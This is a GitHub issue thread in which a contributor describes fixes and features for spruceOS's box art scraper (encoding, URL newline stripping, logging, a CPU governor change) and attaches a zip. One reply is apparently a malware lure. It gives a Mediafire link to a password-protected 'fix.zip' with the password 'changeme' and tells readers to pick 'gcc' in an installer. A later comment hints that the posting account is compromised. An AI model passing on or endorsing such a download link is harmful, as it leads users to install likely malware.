### ISSUE TITLE
Somes Fixes and modifications on Box art scraper

### ISSUE THREAD

**Issue by cinethe-zs** [spruceUI/spruceOS#24]
I made some fix and stuff on box art scraper. Feel free to use it or to ask me anything on this.
[BoxartScraper.zip](https://github.com/user-attachments/files/16762913/BoxartScraper.zip)

Fixes:

- App\BoxartScraper\get_imagelist.py
  - revert ra_aliases dictionnary to avoid key overriding. MD was override and no boxart for MD were download because there were no db/MD_games.txt. And probably also true for other emu that I don't use but now it should be ok for all of them.
  - use encoding="utf-8" to open db files txt to avoid failing on specials character
- App\BoxartScraper\scraper.sh
  - strip line for newline characters in url. Sometimes, when the match you choose was the only one in matches, the result have an extra newline character making the url use to download the png wrong. I think it happens also in other case so I try to unify the way this url is created and to strip it from newline character once and for all.

Features (that you may not want):

- more more more logs to work with
- use powersave governor instead of performance (console is too warm for a long period with performance + the CPU is not even in so much use because most of the time is spent using wifi and writing to the sd card)
- display the last boxart downloaded to show evolution of the process in addition of the "Scraping box art for XXX" screen

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Check your signed in sessions for unknown people
